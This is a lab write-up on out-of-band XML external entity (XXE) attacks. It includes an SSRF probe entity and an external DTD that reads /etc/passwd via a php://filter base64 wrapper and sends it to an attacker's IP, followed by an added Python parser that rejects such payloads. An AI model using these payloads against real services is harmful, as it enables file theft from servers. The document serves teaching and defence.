OOB XXE

March 20, 2024

Task 1: XML Introduction

Task 2: XML External Entity (XXE) Introduction

Task 3: Deploying the machine

Task 4: Assessing the Target Web Application

Task 5: Exploiting OOB XXE

First, capture the web application's POST request in Burp Suite and send it to the Repeater tab.

Then we modify the legitimate request to test for an SSRF vulnerability in the website.

Change the value of the <name> parameter from kyou to &ssrf;, the entity reference that makes the parser resolve the external entity we declare in the DOCTYPE.

<!DOCTYPE response [
<!ENTITY ssrf SYSTEM "http://10.9.193.229:8000">
]>

&ssrf;

In the access log of our Python HTTP server we can see that the target server actually reached it, which confirms that external entities are resolved and the server can connect back to us.

The DTD below is hosted on our Python server as oob-xxe.dtd. The %file; parameter entity reads /etc/passwd through the php://filter base64 wrapper, and %xxe; declares a second entity whose URL carries that data back to us:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'http://10.9.193.229:8000/?data=%file;'>">
%xxe;

In the request we replace the DOCTYPE with one that loads that external DTD, and the <name> value with &exfil;, so the base64-encoded file shows up in our server's access log:

<!DOCTYPE response SYSTEM "http://10.9.193.229:8000/oob-xxe.dtd">

&exfil;
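The following is an added example and not part of the original writeup: a request-parsing policy, built on Python's standard-library expat parser, that refuses both payloads above (the &ssrf; probe and the external-DTD &exfil; request) by rejecting any DOCTYPE, any entity declaration and any external entity reference. This is the "disable DTDs" mitigation Task 6 refers to. The <response>/<name> document shape is assumed from the DOCTYPE name and the parameter the writeup changes; the request bodies are constructed here.

```python
# Added example (not the writeup's own code): refuse DOCTYPE/entity features
# in untrusted XML so that neither the SSRF probe nor the OOB exfil request
# is ever resolved by the parser.
import xml.parsers.expat as expat


class ForbiddenDtd(ValueError):
    """Raised when untrusted XML tries to use a DOCTYPE or an entity."""


def parse_untrusted_xml(data: str) -> dict:
    """Parse XML from a client into {element name: text} with DTD features refused.

    Raises ForbiddenDtd on any DOCTYPE, entity declaration or external entity
    reference, and expat.ExpatError on malformed XML.
    """
    parser = expat.ParserCreate()
    # Never expand parameter entities (the %file; / %xxe; trick), even if a DTD got through.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenDtd(f"DOCTYPE not allowed (root {name!r}, SYSTEM {sysid!r})")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenDtd(f"entity declaration not allowed: {name!r}")

    def forbid_external(context, base, sysid, pubid):
        raise ForbiddenDtd(f"external entity reference not allowed: {sysid!r}")

    # Exceptions raised inside expat handlers stop parsing and propagate out of Parse().
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external

    texts: dict = {}
    open_elements: list = []

    def start(name, attrs):
        open_elements.append(name)
        texts.setdefault(name, "")

    def chars(text):
        if open_elements:
            texts[open_elements[-1]] += text

    def end(name):
        open_elements.pop()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return texts


def check_request(data: str) -> tuple:
    """Return (accepted, detail): the parsed fields when accepted, else the reason."""
    try:
        return True, parse_untrusted_xml(data)
    except ForbiddenDtd as exc:
        return False, f"rejected: {exc}"
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"


# Constructed request bodies. The <response> root and <name> child are assumed
# from the writeup; the DOCTYPE/entity lines are the payloads it shows.
BENIGN_REQUEST = "<response><name>kyou</name></response>"
SSRF_PROBE = (
    '<!DOCTYPE response [<!ENTITY ssrf SYSTEM "http://10.9.193.229:8000">]>'
    "<response><name>&ssrf;</name></response>"
)
OOB_REQUEST = (
    '<!DOCTYPE response SYSTEM "http://10.9.193.229:8000/oob-xxe.dtd">'
    "<response><name>&exfil;</name></response>"
)

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_REQUEST), ("ssrf probe", SSRF_PROBE), ("oob xxe", OOB_REQUEST)]:
        print(label, "->", check_request(body))
```

Running the file prints the verdict for each of the three bodies: the benign request yields the parsed fields, while both payloads are rejected at the DOCTYPE before any entity is declared, let alone fetched. In a real application, libraries such as defusedxml apply this same kind of policy through the parser's DTD and entity hooks, so prefer one of those over hand-rolling the checks.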

Task 6: Impact, Mitigation, Tools, and References
